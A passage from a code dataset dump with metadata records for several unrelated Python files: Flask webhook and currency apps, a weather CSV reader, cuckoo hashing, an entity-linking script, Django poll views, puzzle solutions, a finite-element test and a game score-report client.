request.data.decode('utf-8')\n print(data)\n WriteData(data, 'qqq_d1')\n \n return \"OK!\"\n\n@app.route('/webhook_qqq_h4', methods=['POST'])\ndef webhook_qqq_h4():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'qqq_h4')\n \n return \"OK!\"\n\n@app.route('/webhook_spy_d2', methods=['POST'])\ndef webhook_spy_d2():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'spy_d2')\n \n return \"OK!\"\n\n@app.route('/webhook_spy_d1', methods=['POST'])\ndef webhook_spy_d1():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'spy_d1')\n \n return \"OK!\"\n\n@app.route('/webhook_spy_h4', methods=['POST'])\ndef webhook_spy_h4():\n print(\"--request start--\")\n print(request)\n print(request.data)\n print(\"--request end--\")\n \n data = request.data.decode('utf-8')\n print(data)\n WriteData(data, 'spy_h4')\n \n return \"OK!\"\n\n\ndef allowed_gai_family():\n # \"\"\"\n # https://github.com/shazow/urllib3/blob/master/urllib3/util/connection.py\n # \"\"\"\n family = socket.AF_INET\n return family\n\nurllib3_cn.allowed_gai_family = allowed_gai_family\n\n\n\n\n# app.add_url_rule('/favicon.ico',redirect_to=url_for('static', filename='favicon.ico'))\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=443, ssl_context=('C:\\\\SSL_TOOL\\\\secret\\\\certificate.crt', 'C:\\\\SSL_TOOL\\\\secret\\\\private.key'))\n\n# print(CheckCurrentMonthData('20220326'))\n\n\n","repo_name":"puremars2015/StockTracker","sub_path":"python_files/myapi.py","file_name":"myapi.py","file_ext":"py","file_size_in_byte":11874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15571033312","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 16 15:26:40 2018\n\n@author: s1881079\n\"\"\"\n\nfrom datetime import datetime\nimport time\nimport re\nimport sys\n\n__all__ = ['readJCMB','goodBye']\n\n\ndef modTomorrow(str_lstday):\n '''Generate datetime object from string when string has '24:00'\n \n datetime.strptime() cannot identify '24:00', therefore this fuction \n generate timestamp of string containing '24:00' and then convert it to\n datetime type.\n \n ..code referencing:\n https://stackoverflow.com/questions/3493924/how-can-i-convert-the-time-in-a-datetime-string-from-2400-to-0000-in-python\n \n Parameters\n ----------\n str_lstday : str\n string of date to convert, format '%Y/%m/%d %H:%M'\n \n Returns\n -------\n datetime\n data in datetime type of the input date\n \n \n '''\n try:\n tup_lstday = tuple((int(i) for i in (re.split(r'/| |:', str_lstday))))\n tup_tail = (0,0,1,-1)\n tup_lstday += tup_tail\n time_stamp = time.mktime(tup_lstday)\n except:\n print('fail to modify time with 24:00 to 0:00')\n return None\n \n try:\n mod_tomorrow = datetime.fromtimestamp(time_stamp)\n except:\n print('fail to generate datetime from timestamp')\n \n return mod_tomorrow\n \n\ndef modifyTime(ori_strtime):\n '''Convert date information from string to datetime\n \n format of string should be like '%Y/%m/%d %H:%M'\n ''' \n try:\n md_date = datetime.strptime(ori_strtime,'%Y/%m/%d %H:%M')\n except:\n if ori_strtime[11:13] == '24':\n try:\n md_date = modTomorrow(ori_strtime)\n except:\n print('Unexpected date format')\n return None\n else:\n print('Unexpected date format')\n return None\n \n return md_date\n\n\ndef modifyLine(ori_line):\n '''Modify input line \n \n Each input string will be split by ',', with the first element \n transformed into datetime object and the rest transformed to float.\n datetime format should be like '%Y/%m/%d %H:%M'\n \n Parameters\n ----------\n ori_line : str\n original string \n \n Returns\n -------\n list\n list contained modified data value from the input string\n \n '''\n try:\n slst_line = ori_line[:-1].split(',')\n except:\n print('fail to spit data line with comma')\n return None\n \n md_date = modifyTime(slst_line[0])\n \n if md_date == None:\n print('fail to read date')\n return None\n \n try:\n flst_else= [float(item) for item in slst_line[1:]]\n except:\n print('fail to convert data to float')\n return None\n \n md_line = [md_date] + flst_else\n return md_line\n\n\ndef readHeader(in_file):\n '''Read file header\n \n Read first line of input file, split with ',' and return list of header\n \n Parameters\n ----------\n in_file\n \n Returns\n -------\n list\n list contain the data head\n int\n number of column shown in data head\n \n '''\n print('reading header...')\n data_head = in_file.readline()[:-1].split(',')\n return data_head,len(data_head)\n\n\ndef readValue(in_file,ncols):\n '''read value and modify by line\n \n Read values and modify by line through function modifyLine().\n If a line cannot be stored due to missing or extra column or wrong format etc., \n this line would be skipped.\n \n Parameters\n ----------\n in_file\n file input\n ncols\n number of columns, this should be the same as the number given by readHeader(),\n which is number of cloumns of the header line in file \n \n Returns\n -------\n list\n a result list that contants each list storing each cloumn of data\n \n '''\n print('reading value in following lines...')\n data_value = [[] for i in range(ncols)]\n \n line_num= 1\n valid_linecount = 0\n skip_linecount = 0\n \n for line in in_file.readlines():\n line_num += 1\n md_line = modifyLine(line)\n \n if md_line == None:\n print('skip line ' + str(line_num))\n skip_linecount += 1\n continue\n \n try:\n for (v_lst,v) in zip(data_value,md_line):\n v_lst.append(v)\n except:\n print('fail to include data in line ' + str(line_num) + '''to database. \n please check whether number of data fits with number of header''')\n print('skip line ' + str(line_num))\n skip_linecount += 1\n continue\n \n valid_linecount += 1\n \n print('total line read (except header):' + str(line_num - 1))\n print('valid lines:' + str(valid_linecount) + ' lines')\n print('skipped lines:' + str(skip_linecount) + ' lines')\n \n return data_value\n \n\ndef readJCMB(file_name):\n '''reading file JCMB_2011.csv\n \n This function is wirtten originally to read data in JCMB_2011.csv, but file with\n similar data storing format can also be read using this funciton.\n \n The required format is as follows:\n elements in each line are seperated by ',', lines are seperated by '\\n'\n the first line is a header line\n data in the first coloum indicates date data, format as '%Y/%m/%d %H:%M'\n \n Parameters\n ----------\n filename : str\n \n Returns\n -------\n dict\n dictionary containing header as key and list of data as value\n list\n list of header input. Since the order of storing information in dictionary\n would be regenerated, and considering some headers are quite long and the\n possible need of further using them, the list of header are also reaturned \n to keep the original order that can be more easily checked in the file.\n \n '''\n \n try:\n in_file = open(file_name,'r')\n except:\n print('fail to open file')\n goodBye(0)\n else:\n print('file ' + file_name + ' opened successfully')\n \n try:\n data_head,len_head = readHeader(in_file)\n except:\n print('fail to read header line, closing file...')\n in_file.close()\n return None,None\n \n \n data_value = readValue(in_file,len_head)\n \n try:\n dict_data = dict(zip(data_head, data_value))\n except:\n print('data value and header are read correctly, fail to generate dictionary')\n return None,None\n \n try:\n in_file.close()\n except:\n print('warning: file opened not closed yet')\n else:\n print('file ' + file_name + ' closed successfully')\n \n \n return dict_data,data_head\n\n\ndef goodBye(did_suc):\n '''a little funtion to say goodbye to my dear users :)'''\n if did_suc:\n print('Plotting process succeeded.')\n print('Congratulations! GoodBye~ :)')\n sys.exit(0)\n else:\n print('Sorry for that:( Maybe try again with another data file. \\nGood luck next time! GoodBye~')\n sys.exit(1)","repo_name":"s1881079/weather-info-plotting","sub_path":"TK2/task2IOM.py","file_name":"task2IOM.py","file_ext":"py","file_size_in_byte":7105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23401854732","text":"import Experiment\n\n# Above 8 appears to make no difference in the load factor achieved\nmaxLoop = 8\n\n\ndef cuckoo_insert(value):\n # Iterate through all four hash functions until able to insert or return false if not able\n j = 0\n while j < maxLoop:\n for i in range(len(Experiment.twoHashFunctions)):\n if Experiment.useHalfTable:\n indexOffset = Experiment.twoHashFunctions[i](value)\n index = indexOffset + i * Experiment.halfTable\n else:\n index = Experiment.twoHashFunctions[i](value)\n if Experiment.hashTable[index] is None:\n Experiment.hashTable[index] = value\n return True\n # This else statement actually fails to insert at a lower load factor\n else:\n # There is an element in the index so swap them. This is the Cuckoo step and previous value will try to be hashed\n Experiment.hashTable[index], value = value, Experiment.hashTable[index]\n j += 1\n # print(\"Unable to insert\")\n return False\n\n\n# Return the index of a value if it is in the table\ndef lookup(value):\n # Iterate through all four hash functions searching for the value\n for i in range(len(Experiment.twoHashFunctions)):\n if Experiment.useHalfTable:\n indexOffset = Experiment.twoHashFunctions[i](value)\n index = indexOffset + i * Experiment.halfTable\n else:\n index = Experiment.twoHashFunctions[i](value)\n if Experiment.hashTable[index] is value:\n return index\n print(\"Value not in table\")\n return None\n\n\ndef delete(value):\n # Call lookup to find index, if it exists\n index = lookup(value)\n if index is not None:\n Experiment.hashTable[index] = None\n","repo_name":"Ikuni17/432-Project","sub_path":"Cuckoo_Hashing.py","file_name":"Cuckoo_Hashing.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72526938647","text":"import json\nimport spacy # version 3.5\nimport glob\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndef lire_fichier(chemin):\n with open(chemin, \"r\", encoding=\"utf-8\") as fichier:\n texte = fichier.read()\n return texte\n\ndef stocker(chemin, contenu):\n with open(chemin, \"w\") as w:\n json.dump(contenu, w, indent=2)\n\nmodele = [\"md\"]\npath_corpora = \"../DATA/ELTeC-Fra_2023/ADAM/ADAM_krakenbase/*/*.txt\"\ncommon_urls_per_file = []\ncommon_urls = []\nnon_common_urls = []\n\nfor mod in modele:\n print(\"Pour le modèle:\", mod, \"\\n\")\n nlp = spacy.load(\"fr_core_news_\" + mod)\n nlp.add_pipe(\"entityLinker\", last=True)\n for path in glob.glob(path_corpora):\n print(\"Entrée:\", path)\n texte = lire_fichier(path)\n doc = nlp(texte)\n list_resultats = []\n list_entites = []\n compteur = 0\n intersect = 0\n nb_entite = 0\n\n i = 1\n dico={}\n for ent in doc.ents:\n \n contexte = str(texte[ent.start_char-50:ent.start_char])+str(ent.text)+ str(texte[ent.end_char:ent.end_char+50])\n entite = ent.text\n \n print(entite)\n liste_url_entourage = []\n liste_url_entite = []\n doc3 = nlp(entite)\n doc2 = nlp(contexte)\n for ent in doc2._.linkedEntities:\n url_entourage = ent.get_url()\n liste_url_entourage.append(url_entourage)\n for ent in doc3._.linkedEntities:\n url_entite = ent.get_url()\n liste_url_entite.append(url_entite)\n #print (liste_url_entite)\n for d in liste_url_entite :\n if d in liste_url_entourage :\n #print (d)\n intersect = intersect + 1\n compteur +=1\n nb_entite+= 1\n \n non = compteur-intersect\n print (\"La REN de Spacy a identifié\",nb_entite, \"entités\")\n print(\"L'entity linker a repéré\", compteur,\"entités\")\n print(\"Il y a \",intersect, \"élments communs\")\n print (\"Il y a\", non, \"éléments qui ne sont pas en communs\" )\n \n \n \n# common_urls.extend(liste_url_entite)\n# common_urls_per_file.append((path, set(liste_url_entite) & set(liste_url_entourage)))\n\n# non_common_urls.extend(liste_url_entite)\n\n# # Calculate proportions\n# total_common_urls = len(common_urls)\n# total_non_common_urls = len(non_common_urls)\n# total_urls = total_common_urls + total_non_common_urls\n# common_urls_proportion = total_common_urls / total_urls\n# non_common_urls_proportion = total_non_common_urls / total_urls\n\n# # Create a bar plot\n# labels = ['Common URLs', 'Non-Common URLs']\n# proportions = [common_urls_proportion, non_common_urls_proportion]\n\n# plt.bar(labels, proportions, color=['blue', 'red'])\n# plt.xlabel('URL Types')\n# plt.ylabel('Proportion')\n# plt.title('Proportion of Common URLs and Non-Common URLs')\n# plt.show()\n","repo_name":"CarolineDorleans/Stage-SCAI2023","sub_path":"entityLinker/EXPE03-CAROLINE-STAGE _filtrage/programme/testELSpacy_comparaison-avec-sans-contexte.py","file_name":"testELSpacy_comparaison-avec-sans-contexte.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9053975863","text":"from flask import Flask, render_template, request\nimport calendar\nimport requests\nfrom bs4 import BeautifulSoup\nimport lxml\nimport datetime\nfrom pickle import TRUE, NONE\n\napp = Flask(__name__, static_url_path='/static')\n\n\nclass Currency:\n\n def __init__(self, month, year, iso3, value):\n self.month = int(month)\n self.year = int(year)\n self.iso3 = str(iso3)\n self.value = float(value)\n\n \nhistoryCurrencys = []; \n\ncurrencyConversion = {\n \"EUR-USD\":1.1916,\n \"USD-EUR\":0.8392,\n \"date\":\"-undefined-\"\n }\n\ncurrencys = {\n \"EUR\": {\n \"text\":\"Euro\",\n \"sign\":\"\\u20ac\",\n \"iso2code\":\"EU\",\n \"iso3code\": \"EUR\"\n },\n \"USD\": {\n \"text\":\"Dollar\",\n \"sign\":\"$\",\n \"iso2code\":\"US\",\n \"iso3code\":\"USD\"\n } \n }\n\ncurrentYear = 0\ncurrentMonth = 0\n\n\n@app.route('/')\ndef start():\n global currentYear\n global currentMonth\n \n currentYear = datetime.date.today().year \n currentMonth = datetime.date.today().month\n currentDateStr = getFormatedDate(currentMonth, currentYear)\n iso3 = currencys[\"USD\"][\"iso3code\"]\n if historyListContainsElement(currentMonth, currentYear, iso3):\n usDollar = findHistoryElement(currentMonth, currentYear, iso3)\n else:\n usDollar = loadDataFromCustoms(currencys[\"USD\"][\"iso2code\"], currentMonth, currentYear)\n appendHistoryData(currentMonth, currentYear, iso3, usDollar)\n\n euro = round(1 / usDollar, 4)\n \n currencyConversion[\"EUR-USD\"] = usDollar\n currencyConversion[\"USD-EUR\"] = euro\n currencyConversion[\"date\"] = currentDateStr\n \n srcValue = '1'\n srcCurrency = currencys['EUR']\n destCurrency = currencys['USD']\n \n return render_template(\"template.html\", umrechnunskurse=currencyConversion , srcValue=srcValue, srcCurrencyBlock=srcCurrency, destCurrencyBlock=destCurrency, historyCurrencys=historyCurrencys)\n\n\ndef getFormatedDate(month, year):\n date = \"01.\"\n if(month < 10):\n date = date + \"0\"\n date = date + str(month) + \".\" + str(year)\n return date\n\n\n@app.route('/calc')\ndef calcCurrency():\n srcValue = request.args.get(\"srcValue\")\n srcCurrency = request.args.get(\"srcCurrency\")\n destCurrency = request.args.get(\"destCurrency\")\n key = srcCurrency + \"-\" + destCurrency\n rate = currencyConversion[key]\n \n value = float(srcValue.replace(\",\", \".\"))\n output = round(value * rate, 2)\n \n return render_template(\"output.html\", umrechnunskurse=currencyConversion , srcValue=srcValue, destOutput=str(output), srcCurrencyBlock=currencys[srcCurrency], destCurrencyBlock=currencys[destCurrency], historyCurrencys=historyCurrencys)\n\n\ndef loadDataFromCustoms(currency, monat, jahr): \n max_day_in_month = calendar.monthrange(jahr, monat)[1]\n\n url = \"http://www.zoll.de/SiteGlobals/Functions/Kurse/KursExport.xml?\"\\\n +\"view=xmlexportkursesearchresultZOLLWeb&kursart=1&iso2code2=\" + currency\\\n +\"&startdatum_tag2=01&startdatum_monat2=\" + str(monat) + \"&startdatum_jahr2=\" + str(jahr)\\\n +\"&enddatum_tag2=\" + str(max_day_in_month) + \"&enddatum_monat2=\" + str(monat) + \"&enddatum_jahr2=\"\\\n +str(jahr) + \"&sort=asc&spalte=gueltigkeit\"\n\n print(url)\n\n r = requests.get(url)\n document = BeautifulSoup(r.content, \"lxml\")\n return float(document.find('kurswert').text.replace(\",\", \".\"))\n\ndef historyListContainsElement(month, year, iso3):\n return findHistoryElement(month, year, iso3) != None\n\ndef findHistoryElement(month, year, iso3):\n for c in historyCurrencys:\n if c.month == month and c.year == year and c.iso3 == iso3:\n return c\n return None\n\ndef appendHistoryData(month, year, iso3, value):\n isNew = True\n for c in historyCurrencys:\n if c.month == month and c.year == year:\n isNew = False\n print(c)\n break;\n \n if isNew:\n historyCurrencys.append(Currency(month, year, iso3, value))\n with open(\"static/data.csv\", \"a\") as file:\n file.write(str(month) +';' + str(year) + ';' + str(iso3) + ';' + str(value))\n\ndef loadData():\n global historyCurrencys\n with open(\"static/data.csv\", \"r\") as file:\n for line in file:\n values = line.strip().split(\";\")\n print(values)\n if(len(values) == 4):\n historyCurrencys.append(Currency(values[0], values[1], values[2], values[3]))\n \n year = datetime.date.today().year \n month = datetime.date.today().month\n iso3 = currencys[\"USD\"][\"iso3code\"]\n if historyListContainsElement(month, year, iso3):\n iso2 = currencys[\"USD\"][\"iso2code\"]\n value = loadDataFromCustoms(iso2, month, year)\n appendHistoryData(month, year, iso3, value)\n \napp.before_first_request(loadData); \n\nif __name__ == '__main__':\n app.run()\n \n","repo_name":"StefanDraeger/PyCurrencyCalulator","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31245572022","text":"from django.shortcuts import render, get_object_or_404, get_list_or_404, redirect\nfrom django.http import HttpResponse\n\nfrom django.views.generic import(\n ListView,\n DetailView,\n)\n#ADDED FXNS\nfrom .extra import get_client_ip, add_ip, has_voted\n\nfrom .models import Question, Choice, Voters\n\n\nclass Polls_list_view(ListView):\n template_name = 'polls/polls_list.html'\n model = Question\n \n \n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Polls'\n return context\n\n\nclass Polls_detail_view(DetailView):\n template_name = 'polls/polls_detail.html'\n queryset = Question.objects.all()\n\n def get_object(self):\n id_ = self.kwargs.get('id')\n return get_object_or_404(Question, id=id_)\n \n\ndef Vote(request, id, *args, **kwargs):\n question_ = get_object_or_404(Question, id=id)\n queryset = get_list_or_404(Choice, question = question_)\n context = {\n 'question' : question_,\n 'object_list' : queryset,\n }\n status_ = has_voted(question_, request)\n #print(status_)\n if status_[0]==True:\n return HttpResponse(f'

    You Have already Voted Your Choice Was: {status_[1]}')\n\n\n vote = request.POST.get('vote_given')\n if request.method == 'POST' and vote is not None :\n choice_voted = get_object_or_404(Choice, id=vote, question = question_)\n\n #vote saving\n question_.votes+=1\n choice_voted.votes+=1\n\n question_.save()\n choice_voted.save()\n #adding IP\n add_ip(question_, choice_voted, request)\n\n\n return redirect('../')\n \n return render(request, 'polls/polls_vote.html', context)\n\n\n","repo_name":"aka-vm/Polls-Site","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11439736686","text":"import globalVars as gv\n\nclass Scope():\n def __init__(self, parentScope, filename):\n self.filename = filename\n self.parentScope = parentScope\n self.members = {}\n\n def add(self, nameToken, node):\n name = nameToken.value\n if name not in self.members:\n self.members[name] = node\n return\n\n print(f'{self.filename}:{nameToken.lineNr}: duplicate variable: {name}')\n gv.errors = True\n\n def resolveName(self, nameToken):\n name = nameToken.value\n if name in self.members:\n return self.members[name]\n\n if self.parentScope:\n return self.parentScope.resolveName(nameToken)\n\n print(f'Error:{self.filename}:{nameToken.lineNr}: undeclared variable: {name}')\n gv.errors = True\n return None","repo_name":"simaz33/NewLanguage","sub_path":"scope.py","file_name":"scope.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24802814886","text":"class Solution(object):\n def removeDuplicateLetters(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n countList = [0] *26\n boolList = [False] * 26\n for c in s:\n countList[ord(c)-ord('a')] +=1\n stack = []\n for c in s:\n countList[ord(c) - ord('a')] -= 1\n if boolList[ord(c) - ord('a')]:\n continue\n while len(stack) and c < stack[-1] and countList[ord(stack[-1]) - ord('a')] > 0:\n boolList[ord(stack[-1]) - ord('a')] = False\n stack.pop()\n stack.append(c)\n boolList[ord(c)-ord('a')] = True\n return ''.join(stack)","repo_name":"BohaoLiGithub/Leetcode","sub_path":"316. Remove Duplicate Letters/316. Remove Duplicate Letters(AC).py","file_name":"316. Remove Duplicate Letters(AC).py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8634725741","text":"from itertools import chain\r\n\r\nfrom gendiff.compare_data.comparison_tree import ADD, DEL, KEPT\r\nfrom gendiff.compare_data.comparison_tree import SPLIT, CHANGED\r\nfrom gendiff.compare_data.comparison_tree import STATUS, VALUE\r\nfrom gendiff.compare_data.comparison_tree import VALUE_INITIAL\r\nfrom gendiff.compare_data.comparison_tree import VALUE_MODIFIED\r\n\r\nfrom gendiff.formating.suplementary import convert_non_string as converter\r\n\r\n\r\nRENAME_DICT = {ADD: \"Property '{0}' was added with value: {1}\",\r\n DEL: \"Property '{0}' was removed\"}\r\nUPDATED = \"Property '{0}' was updated. From {1} to {2}\"\r\n\r\n\r\ndef convert_value(argument):\r\n complex_formats = [list, dict, set, tuple]\r\n if isinstance(argument, str):\r\n return f\"'{argument}'\"\r\n if type(argument) in complex_formats:\r\n return \"[complex value]\"\r\n return str(converter(argument))\r\n\r\n\r\ndef walker(data, pedigree=[]):\r\n line = []\r\n for name, match in data.items():\r\n status = match[STATUS]\r\n if status == KEPT:\r\n continue\r\n parent = pedigree + [name]\r\n full_name = \".\".join(parent)\r\n if status == SPLIT:\r\n line += chain(walker(match[VALUE], parent))\r\n elif status == CHANGED:\r\n deleted = convert_value(match[VALUE_INITIAL])\r\n changed = convert_value(match[VALUE_MODIFIED])\r\n line.append(UPDATED.format(full_name, deleted, changed))\r\n else:\r\n changed = convert_value(match[VALUE])\r\n line.append(RENAME_DICT[status].format(full_name, changed))\r\n return line\r\n\r\n\r\ndef generate_plain(data):\r\n lines = walker(data)\r\n return '\\n'.join(lines)\r\n","repo_name":"VVtatarinoff/python-project-lvl2","sub_path":"gendiff/formating/plain.py","file_name":"plain.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2591366526","text":"# Reading in Data as .txt file\nwith open('Day04.txt', 'r') as inputFile:\n p_input = inputFile.read()\n\n\ndef ParseInput(puzzle):\n newPuzzle = []\n newPuzzle_Segment = []\n newPuzzle_Line = ''\n for p in range(len(puzzle)):\n if puzzle[p] != '\\n':\n newPuzzle_Line = newPuzzle_Line + puzzle[p]\n if p == len(puzzle) - 1:\n newPuzzle_Segment.append(newPuzzle_Line.split(','))\n elif puzzle[p] == '\\n':\n newPuzzle_Segment.append(newPuzzle_Line.split(','))\n newPuzzle_Line = ''\n # Fill out the sections\n for segment in newPuzzle_Segment:\n Section_List = []\n for s in segment:\n Section = s.split('-')\n Section = list(range(int(Section[0]), int(Section[-1]) + 1, 1))\n Section_List.append(Section)\n newPuzzle.append(Section_List)\n return newPuzzle\n\n\ndef FindContainedSections(Section):\n Section_Intersection = (list(set(Section[0]).intersection(set(Section[1]))))\n Section_Intersection.sort()\n # Part One\n # if Section_Intersection == Section[0] or Section_Intersection == Section[1]:\n # return True\n # else:\n # return False\n #\n # Part Two\n if len(Section_Intersection) > 0:\n return True\n else:\n return False\n\n\nprint(p_input)\np_input = ParseInput(p_input)\n\nTally = 0\nfor p in p_input:\n Contained = FindContainedSections(p)\n if Contained is True:\n Tally += 1\n elif Contained is False:\n pass\nprint(Tally)\n","repo_name":"jmoore-94/AOC_2022","sub_path":"AdventOfCode2022_04.py","file_name":"AdventOfCode2022_04.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"25822833125","text":"# -*- coding: utf-8 -*-\n'''Test extrapolation from Gauss points. Home made test.'''\n\nfrom __future__ import division\nfrom __future__ import print_function\n\n__author__= \"Luis C. Pérez Tato (LCPT) and Ana Ortega (AOO)\"\n__copyright__= \"Copyright 2020, LCPT and AOO\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"l.pereztato@gmail.com\"\n\nimport xc\nfrom solution import predefined_solutions\nfrom model import predefined_spaces\nfrom materials import typical_materials\n# from postprocess import output_handler\n\n# Problem type\nfeProblem= xc.FEProblem()\npreprocessor= feProblem.getPreprocessor\n# Materials definition\nelast2d= typical_materials.defElasticIsotropicPlaneStress(preprocessor, \"elast2d\",E= 1e9,nu= 0.3, rho= 0.0)\n\nnodes= preprocessor.getNodeHandler \nmodelSpace= predefined_spaces.SolidMechanics2D(nodes)\nnod0= nodes.newNodeXY(0,0)\nnod1= nodes.newNodeXY(0.5,0)\nnod2= nodes.newNodeXY(1,0)\nnod3= nodes.newNodeXY(0,0.5)\nnod4= nodes.newNodeXY(0.5,0.5)\nnod5= nodes.newNodeXY(1,0.5)\nnod6= nodes.newNodeXY(0,1)\nnod7= nodes.newNodeXY(0.5,1)\nnod8= nodes.newNodeXY(1,1)\n\nelements= preprocessor.getElementHandler\nelements.defaultMaterial= elast2d.name\n\n\nquad0= elements.newElement('FourNodeQuad',xc.ID([nod0.tag, nod1.tag, nod4.tag, nod3.tag]))\nquad1= elements.newElement('FourNodeQuad',xc.ID([nod1.tag, nod2.tag, nod5.tag, nod4.tag]))\nquad2= elements.newElement('FourNodeQuad',xc.ID([nod3.tag, nod4.tag, nod7.tag, nod6.tag]))\nquad3= elements.newElement('FourNodeQuad',xc.ID([nod4.tag, nod5.tag, nod8.tag, nod7.tag]))\nquads= [quad0, quad1, quad2, quad3]\n\n# totalSet= preprocessor.getSets.getSet('total')\n# for e in totalSet.getElements:\n# print(e.tag, 'K= ', e.getTangentStiff().Norm())\nnod0.fix(xc.ID([0,1]),xc.Vector([0,0]) )\nnod1.fix(xc.ID([1]),xc.Vector([0]) )\nnod2.fix(xc.ID([1]),xc.Vector([0]) )\n\n# Load definition\nP= 10e3*2/3 # punctual load.\n## Load case definition.\nlp0= modelSpace.newLoadPattern(name= '0')\nmodelSpace.setCurrentLoadPattern(lp0.name)\nnod2.newLoad(xc.Vector([P,0]))\nnod3.newLoad(xc.Vector([-P,0]))\nnod5.newLoad(xc.Vector([P,0]))\nnod6.newLoad(xc.Vector([-P,P]))\nnod7.newLoad(xc.Vector([0,P]))\nnod8.newLoad(xc.Vector([P,P]))\n## We add the load case to domain.\nmodelSpace.addLoadCaseToDomain(lp0.name)\n\n# Graphic stuff. Uncomment to get graphics working.\n#oh= output_handler.OutputHandler(modelSpace)\n\n# Uncomment to display the mesh\n# oh.displayFEMesh()\n\n# Solution\nanalysis= predefined_solutions.simple_static_linear(feProblem)\nresult= analysis.analyze(1)\n\n\nsXnodes= list()\nsYnodes= list()\nsX= 0.0\nsY= 0.0\nsXY= 0.0\ncount= 0.0\nfor q in quads: \n elementStresses= q.physicalProperties.getVectorMaterials.getValues('stress', False)\n nodeStresses= q.getExtrapolatedValues(elementStresses)\n #vMises= q.physicalProperties.getVectorMaterials.getValues('von_mises_stress', False)\n # print('element stresses: ', elementStresses)\n # print('node stresses: ', nodeStresses)\n\n sz= nodeStresses.noRows\n for i in range(0,sz):\n sX+= nodeStresses(i,0)\n sY+= nodeStresses(i,1)\n sXY+= nodeStresses(i,2)/2.0\n sYnodes.append(sY)\n sXnodes.append(sX)\n count+= 1\n\nsX/= count\nsY/= count\nsXY/= count\nsXerr= (sX-3*P)/3/P\nsYerr= (sY-3*P)/3/P\ntauErr= sXY\n\n# oh.displayLoads()\n# oh.displayDispRot('uY')\n# oh.displayStresses('sigma_11')\n# oh.displayVonMisesStresses()\n# oh.displayStresses('sigma_22')\n# oh.displayStresses('sigma_12')\n# oh.displayStrains('epsilon_xx')\n# oh.displayStrains('epsilon_yy')\n\n'''\nprint('sigma_11 on nodes: ', sXnodes)\nprint('sigma_22 on nodes: ', sYnodes)\nprint('sigma_11: ', sX)\nprint('sigma_22: ', sY)\nprint('sigma_12: ', sXY)\nprint('error in sigma_11: ', sXerr)\nprint('error in sigma_22: ', sYerr)\nprint('error in sigma_12: ', tauErr)\n'''\n\nimport os\nfrom misc_utils import log_messages as lmsg\nfname= os.path.basename(__file__)\nif(sXerr<1e-10 and sYerr<1e-10 and tauErr<1e-10):\n print('test '+fname+': ok.')\nelse:\n lmsg.error(fname+' ERROR.')\n","repo_name":"xcfem/xc","sub_path":"verif/tests/elements/plane/test_extrapolate_values_quad_02.py","file_name":"test_extrapolate_values_quad_02.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"} +{"seq_id":"19852348618","text":"# coding: utf-8\n# Created on 2013-8-28\n# Author: Panjiang\n\nimport json\nimport urllib\nfrom sdk.util.http import HttpRequest\n\n\nclass ReportApi(object):\n \"\"\"\n 上报数据接口\n \"\"\"\n\n def __init__(self, appid, qq_rank_host, wx_rank_host, log=None):\n self.appid = appid\n self.qq_rank_host = qq_rank_host\n self.wx_rank_host = wx_rank_host\n self.http = HttpRequest(log)\n\n def update_qq_score(self, zone_id, nickname, openid, score=None, top_score=None):\n \"\"\"\n 更新qq用户游戏分数\n\n Example:\n http://10.153.96.115:10000/game/rp_achieves?appid=xxx&access_token=xxx&openid=xxx&uin=xxx¶m={}\n \"\"\"\n if score:\n score = int(score)\n if top_score:\n top_score = int(top_score)\n ls = []\n\n item_zone = {'type':1001, 'data':str(zone_id), 'expires':0, 'bcover':1}\n ls.append(item_zone)\n\n url_nickname = urllib.quote(nickname.encode('utf8'))\n item_nickname = {'type':1002, 'data': url_nickname, 'expires':0, 'bcover':1}\n ls.append(item_nickname)\n\n\n if score:\n item_score = {'type':3, 'data':str(score), 'expires':0, 'bcover':0}\n ls.append(item_score)\n\n if top_score:\n max_score = {'type':5, 'data':str(top_score), 'expires':0, 'bcover':1}\n ls.append(max_score)\n\n data = json.dumps({\"zone\":2, \"total\":10, \"list\":ls})\n uri = '/v2/game/rp_achieves?appid=%s&openid=%s¶m=%s' % (self.appid, openid, data)\n\n # host = (\"192.168.10.241\", 8080)\n # uri = '/test.php?appid=%s&openid=%s¶m=%s' % (product.appid, user.openid, data)\n self.http.request(self.qq_rank_host, 